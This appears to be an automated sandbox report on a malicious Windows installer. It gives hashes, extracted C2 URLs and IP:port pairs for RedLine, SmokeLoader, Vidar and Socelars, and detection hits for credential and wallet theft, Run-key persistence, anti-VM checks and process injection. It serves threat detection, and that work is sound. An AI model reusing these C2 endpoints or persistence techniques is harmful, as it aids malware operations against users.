Analysis
-
max time kernel
1053s -
max time network
1065s -
submitted
01-01-1970 00:00
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.6MB
-
MD5
4fb905881241f7cec09bfc91858931e6
-
SHA1
51aa57dd56637f8fa8332eae9c846ec5be379b95
-
SHA256
f2f7017a9fb071deaaee04e1cbe071d6d207e19852143148a4bc2ecf83b2195b
-
SHA512
111ee308e8669d76737a92968c3420acb3cd57f4f2e5efcc2e020568a9e98bacbe4c9b2ebc361cda226484108beef323b4dd36fab9f957556e0e94dbd5246b31
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
media26
91.121.67.60:23325
Extracted
redline
chris
194.104.136.5:46013
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6552 3900 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2764 3900 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8844 3900 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8856 3900 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7244 3900 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9116 3900 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7680 3900 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/2200-270-0x0000000000418D26-mapping.dmp family_redline behavioral1/memory/2200-268-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/3756-289-0x0000000000418D32-mapping.dmp family_redline behavioral1/memory/3756-286-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09db0d52c38.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09db0d52c38.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 5080 created 2848 5080 WerFault.exe run.exe PID 1496 created 5016 1496 WerFault.exe Wed09cfb2f9758281d8.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
regsvr32.exedescription pid process target process PID 8944 created 2888 8944 regsvr32.exe Explorer.EXE -
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4680-577-0x0000000002E30000-0x0000000002F06000-memory.dmp family_vidar behavioral1/memory/4680-593-0x0000000000400000-0x0000000002C15000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8213C1D5\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 54 IoCs
Processes:
MsiExec.exeMsiExec.execmd.exeflow pid process 343 3992 MsiExec.exe 351 3992 MsiExec.exe 525 2392 MsiExec.exe 747 3992 MsiExec.exe 750 3992 MsiExec.exe 752 3992 MsiExec.exe 753 3992 MsiExec.exe 756 3992 MsiExec.exe 757 3992 MsiExec.exe 758 3992 MsiExec.exe 759 3992 MsiExec.exe 760 3992 MsiExec.exe 761 3992 MsiExec.exe 762 3992 MsiExec.exe 763 3992 MsiExec.exe 764 3992 MsiExec.exe 765 3992 MsiExec.exe 766 3992 MsiExec.exe 767 3992 MsiExec.exe 771 3992 MsiExec.exe 773 3992 MsiExec.exe 776 3992 MsiExec.exe 777 3992 MsiExec.exe 778 3992 MsiExec.exe 779 3992 MsiExec.exe 780 3992 MsiExec.exe 781 3992 MsiExec.exe 782 3992 MsiExec.exe 783 3992 MsiExec.exe 784 3992 MsiExec.exe 785 3992 MsiExec.exe 786 3992 MsiExec.exe 787 3992 MsiExec.exe 788 3992 MsiExec.exe 789 3992 MsiExec.exe 790 3992 MsiExec.exe 791 3992 MsiExec.exe 793 3992 MsiExec.exe 794 3992 MsiExec.exe 795 3992 MsiExec.exe 796 3992 MsiExec.exe 797 3992 MsiExec.exe 798 3992 MsiExec.exe 799 3992 MsiExec.exe 800 3992 MsiExec.exe 801 3992 MsiExec.exe 805 3992 MsiExec.exe 806 3992 MsiExec.exe 983 2316 cmd.exe 1000 2316 cmd.exe 1093 2316 cmd.exe 1105 2316 cmd.exe 1203 2316 cmd.exe 1291 2316 cmd.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
Conhost.exeDYbALA.exeDYbALA.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeWed09f257bb7877d00b2.exeWed09b3a5ca1a712d390.exeWed096a1bff61.exeWed09d8d6edfaff2ac.exeWed09d27135e5a8b3b.exeWed09cfb2f9758281d8.exesetup.exeWed09db0d52c38.exeWed0971f17486f8.exeWed0901eb1dae126e32.exeWed09977fdc12334.exeWed094c47c32b.exeWed09c42cad92c20f79.exeWed09abf83d9c2.exeWed09b2a8bc4f16cb.exeWed09d27135e5a8b3b.tmpWed09d27135e5a8b3b.exeWed09d27135e5a8b3b.tmpAltrove.exe.comWed0901eb1dae126e32.exeWed0971f17486f8.exerun.exerun2.exeWed0901eb1dae126e32.exeConhost.exeAZncMKOcV3N_LXTxtk8_VdBl.exeMG0w73FVQVCrL19dlDkqTE0U.exeBCleanSoft82.exeinst1.exeSoft1WW02.exe4.exe5.exemsiexec.exe4825122.exe2482554.exewangting-game.exe4080892.exe6776654.exeCalculator Installation.exe10.exeChrome5.exeWinHoster.exekPBhgOaGQk.exeMsiExec.exe7954272.exe6640402.exe2003872.exeLzmwAqmV.exesvchost.exe14498.exe4965181.exemkUYpAqnTT_Y6NFFnI0BnMAQ.exewR3As23OUq8e53mcaRA_FPuS.exeZzEa6lWClVPLFIq3UqymzBXh.exeVJLY_KstCN_8p2Gf_Rv0VShA.exeexplorer.exemshta.exe0s6GO8qqgS7xOWfXxdlhB8L8.exeFcV14WEg5407DrTsHvKslqZf.exe67j94FgroPgh6JIk3aUx67IB.exeE67re5CdQRiyZeOq0TjTHrFT.exepid process 4392 setup_installer.exe 3236 setup_install.exe 1572 Wed09f257bb7877d00b2.exe 2656 Wed09b3a5ca1a712d390.exe 2484 Wed096a1bff61.exe 3416 Wed09d8d6edfaff2ac.exe 1172 Wed09d27135e5a8b3b.exe 5016 Wed09cfb2f9758281d8.exe 5088 setup.exe 1108 Wed09db0d52c38.exe 2388 Wed0971f17486f8.exe 5096 Wed0901eb1dae126e32.exe 4760 Wed09977fdc12334.exe 4972 Wed094c47c32b.exe 3012 Wed09c42cad92c20f79.exe 8 Wed09abf83d9c2.exe 2080 Wed09b2a8bc4f16cb.exe 716 Wed09d27135e5a8b3b.tmp 4068 Wed09d27135e5a8b3b.exe 4612 Wed09d27135e5a8b3b.tmp 3648 Altrove.exe.com 2228 Wed0901eb1dae126e32.exe 2200 Wed0971f17486f8.exe 2848 run.exe 4208 run2.exe 3756 Wed0901eb1dae126e32.exe 656 Conhost.exe 1248 AZncMKOcV3N_LXTxtk8_VdBl.exe 2452 MG0w73FVQVCrL19dlDkqTE0U.exe 2632 BCleanSoft82.exe 1092 inst1.exe 4680 Soft1WW02.exe 2400 4.exe 1976 5.exe 4744 msiexec.exe 1804 4825122.exe 5088 setup.exe 528 2482554.exe 2720 wangting-game.exe 5104 4080892.exe 3060 6776654.exe 1884 Calculator Installation.exe 1360 10.exe 2100 Chrome5.exe 5500 WinHoster.exe 5132 kPBhgOaGQk.exe 2392 MsiExec.exe 5100 7954272.exe 2152 6640402.exe 4460 2003872.exe 5700 LzmwAqmV.exe 4240 svchost.exe 5184 14498.exe 2636 4965181.exe 3268 mkUYpAqnTT_Y6NFFnI0BnMAQ.exe 5192 wR3As23OUq8e53mcaRA_FPuS.exe 5000 ZzEa6lWClVPLFIq3UqymzBXh.exe 5812 VJLY_KstCN_8p2Gf_Rv0VShA.exe 5532 explorer.exe 4700 mshta.exe 4932 0s6GO8qqgS7xOWfXxdlhB8L8.exe 5256 FcV14WEg5407DrTsHvKslqZf.exe 5696 67j94FgroPgh6JIk3aUx67IB.exe 5408 E67re5CdQRiyZeOq0TjTHrFT.exe -
Tries to connect to .bazar domain 10 IoCs
Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.
Processes:
flow ioc 1201 whitestorm9p.bazar 1285 reddew28c.bazar 1287 whitestorm9p.bazar 1010 reddew28c.bazar 1011 bluehail.bazar 1012 whitestorm9p.bazar 1013 aqsouhyw.bazar 1199 reddew28c.bazar 1200 bluehail.bazar 1286 bluehail.bazar -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
VJLY_KstCN_8p2Gf_Rv0VShA.exekpLsXooVeYn5KXmt5cla_REP.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VJLY_KstCN_8p2Gf_Rv0VShA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VJLY_KstCN_8p2Gf_Rv0VShA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kpLsXooVeYn5KXmt5cla_REP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kpLsXooVeYn5KXmt5cla_REP.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Wed09977fdc12334.exeQUQj_70JzOWH0xslz_5jdVAu.exeJotitojyzhae.exeRalyxixaeco.exeCalculator.exerun2.exeCalculator.exegkYTnqBZBqUPnzpamoekAIM0.exeCalculator.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Wed09977fdc12334.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation QUQj_70JzOWH0xslz_5jdVAu.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Jotitojyzhae.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Ralyxixaeco.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation run2.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation gkYTnqBZBqUPnzpamoekAIM0.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeWed09d27135e5a8b3b.tmpWed09d27135e5a8b3b.tmpCalculator Installation.exemsiexec.exegkYTnqBZBqUPnzpamoekAIM0.exesetup.exerundll32.execmd.exeFcV14WEg5407DrTsHvKslqZf.exenmDpho0Rqwv3pDRRZHOjSsDL.exeMsiExec.exekFRqN4Hc4UL5STN4QTkWyQbn.exeCalculator.exesetup.exekz0TRXTqgY84jnr15mFDIwO1.exetwjpSfW7b7DaWXoO_nabM6tv.tmpkz0TRXTqgY84jnr15mFDIwO1.exetwjpSfW7b7DaWXoO_nabM6tv.tmpsetup.exesetup.exeCalculator.exeinstaller.exepid process 3236 setup_install.exe 3236 setup_install.exe 3236 setup_install.exe 3236 setup_install.exe 3236 setup_install.exe 3236 setup_install.exe 3236 setup_install.exe 716 Wed09d27135e5a8b3b.tmp 4612 Wed09d27135e5a8b3b.tmp 1884 Calculator Installation.exe 1884 Calculator Installation.exe 1732 msiexec.exe 1732 msiexec.exe 1908 gkYTnqBZBqUPnzpamoekAIM0.exe 1908 gkYTnqBZBqUPnzpamoekAIM0.exe 1884 Calculator Installation.exe 1884 Calculator Installation.exe 1884 Calculator Installation.exe 6684 setup.exe 6684 setup.exe 6572 rundll32.exe 5108 cmd.exe 5256 FcV14WEg5407DrTsHvKslqZf.exe 4184 nmDpho0Rqwv3pDRRZHOjSsDL.exe 4184 nmDpho0Rqwv3pDRRZHOjSsDL.exe 5256 FcV14WEg5407DrTsHvKslqZf.exe 3992 MsiExec.exe 7152 kFRqN4Hc4UL5STN4QTkWyQbn.exe 7152 kFRqN4Hc4UL5STN4QTkWyQbn.exe 1528 Calculator.exe 1528 Calculator.exe 7152 kFRqN4Hc4UL5STN4QTkWyQbn.exe 7152 kFRqN4Hc4UL5STN4QTkWyQbn.exe 7152 kFRqN4Hc4UL5STN4QTkWyQbn.exe 7152 kFRqN4Hc4UL5STN4QTkWyQbn.exe 7072 setup.exe 7072 setup.exe 3560 kz0TRXTqgY84jnr15mFDIwO1.exe 3560 kz0TRXTqgY84jnr15mFDIwO1.exe 2216 twjpSfW7b7DaWXoO_nabM6tv.tmp 788 kz0TRXTqgY84jnr15mFDIwO1.exe 788 kz0TRXTqgY84jnr15mFDIwO1.exe 6952 twjpSfW7b7DaWXoO_nabM6tv.tmp 788 kz0TRXTqgY84jnr15mFDIwO1.exe 788 kz0TRXTqgY84jnr15mFDIwO1.exe 3560 kz0TRXTqgY84jnr15mFDIwO1.exe 788 kz0TRXTqgY84jnr15mFDIwO1.exe 788 kz0TRXTqgY84jnr15mFDIwO1.exe 3560 kz0TRXTqgY84jnr15mFDIwO1.exe 788 kz0TRXTqgY84jnr15mFDIwO1.exe 3560 kz0TRXTqgY84jnr15mFDIwO1.exe 7784 setup.exe 7784 setup.exe 3560 kz0TRXTqgY84jnr15mFDIwO1.exe 3560 kz0TRXTqgY84jnr15mFDIwO1.exe 5676 setup.exe 5676 setup.exe 6684 setup.exe 6684 setup.exe 6684 setup.exe 6732 Calculator.exe 7972 installer.exe 7972 installer.exe 6684 setup.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 16 IoCs
Processes:
oDzI6pgLfFznDi2viuJtdUSc.exeDYbALA.exesetup.exesetup.exesetup.exe6776654.execmd.exeConhost.exesetup.exeED4D.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" oDzI6pgLfFznDi2viuJtdUSc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Fugaetoduwa.exe\"" DYbALA.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6776654.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce oDzI6pgLfFznDi2viuJtdUSc.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AX40QL0P = "C:\\Program Files (x86)\\Rprqhz\\tjrixg4.exe" cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gazhovaliha.exe\"" Conhost.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f9056f7f-431e-4060-84c4-36a2a3c4afc4\\ED4D.exe\" --AutoStart" ED4D.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
kpLsXooVeYn5KXmt5cla_REP.exejg1_1faf.exeVJLY_KstCN_8p2Gf_Rv0VShA.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kpLsXooVeYn5KXmt5cla_REP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VJLY_KstCN_8p2Gf_Rv0VShA.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exedescription ioc process File opened (read-only) \??\I: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\J: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 21 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 128 ipinfo.io 136 ipinfo.io 507 ipinfo.io 552 ipinfo.io 104 freegeoip.app 108 freegeoip.app 341 ipinfo.io 551 ipinfo.io 554 api.2ip.ua 28 ip-api.com 102 freegeoip.app 340 ipinfo.io 506 ipinfo.io 129 ipinfo.io 282 ipinfo.io 286 ipinfo.io 462 ip-api.com 838 api.2ip.ua 853 api.2ip.ua 105 freegeoip.app 283 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 22 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent E957BE29A849A93D svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 9A6E1BB7FF198DF4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 8F5717E39BFCA4F5 svchost.exe File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
VJLY_KstCN_8p2Gf_Rv0VShA.exekpLsXooVeYn5KXmt5cla_REP.exepid process 5812 VJLY_KstCN_8p2Gf_Rv0VShA.exe 5388 kpLsXooVeYn5KXmt5cla_REP.exe -
Suspicious use of SetThreadContext 28 IoCs
Processes:
Wed0971f17486f8.exeWed0901eb1dae126e32.exerun.exesvchost.exeZzEa6lWClVPLFIq3UqymzBXh.exeAZncMKOcV3N_LXTxtk8_VdBl.exe3ntxIvNO4gdqLCZTEKYoD5OS.execmd.exe67j94FgroPgh6JIk3aUx67IB.exemshta.exeMG0w73FVQVCrL19dlDkqTE0U.exesvchost.exe9E51.execonhost.exeED4D.exeED4D.exebuild2.exebuild3.exemstsca.exeregsvr32.exeAltrove.exe.commstsca.exemstsca.exemstsca.exemstsca.exefcwcirjmstsca.exedescription pid process target process PID 2388 set thread context of 2200 2388 Wed0971f17486f8.exe Wed0971f17486f8.exe PID 5096 set thread context of 3756 5096 Wed0901eb1dae126e32.exe Wed0901eb1dae126e32.exe PID 2848 set thread context of 5988 2848 run.exe AppLaunch.exe PID 4240 set thread context of 2432 4240 svchost.exe AppLaunch.exe PID 5000 set thread context of 2888 5000 ZzEa6lWClVPLFIq3UqymzBXh.exe Explorer.EXE PID 1248 set thread context of 2888 1248 AZncMKOcV3N_LXTxtk8_VdBl.exe Explorer.EXE PID 1744 set thread context of 4944 1744 3ntxIvNO4gdqLCZTEKYoD5OS.exe AppLaunch.exe PID 2316 set thread context of 2888 2316 cmd.exe Explorer.EXE PID 5696 set thread context of 1164 5696 67j94FgroPgh6JIk3aUx67IB.exe 67j94FgroPgh6JIk3aUx67IB.exe PID 4700 set thread context of 2664 4700 mshta.exe YbWuVbqAC4SM3YjA7D7n72Oc.exe PID 2452 set thread context of 2808 2452 MG0w73FVQVCrL19dlDkqTE0U.exe MG0w73FVQVCrL19dlDkqTE0U.exe PID 4708 set thread context of 6872 4708 svchost.exe svchost.exe PID 9080 set thread context of 9212 9080 9E51.exe 9E51.exe PID 8736 set thread context of 5532 8736 conhost.exe explorer.exe PID 2316 set thread context of 5532 2316 cmd.exe explorer.exe PID 632 set thread context of 6156 632 ED4D.exe ED4D.exe PID 956 set thread context of 7328 956 ED4D.exe ED4D.exe PID 4800 set thread context of 8240 4800 build2.exe build2.exe PID 5220 set thread context of 6896 5220 build3.exe build3.exe PID 9144 set thread context of 6720 9144 mstsca.exe mstsca.exe PID 8944 set thread context of 7564 8944 regsvr32.exe chrome.exe PID 6828 set thread context of 9060 6828 Altrove.exe.com nslookup.exe PID 5428 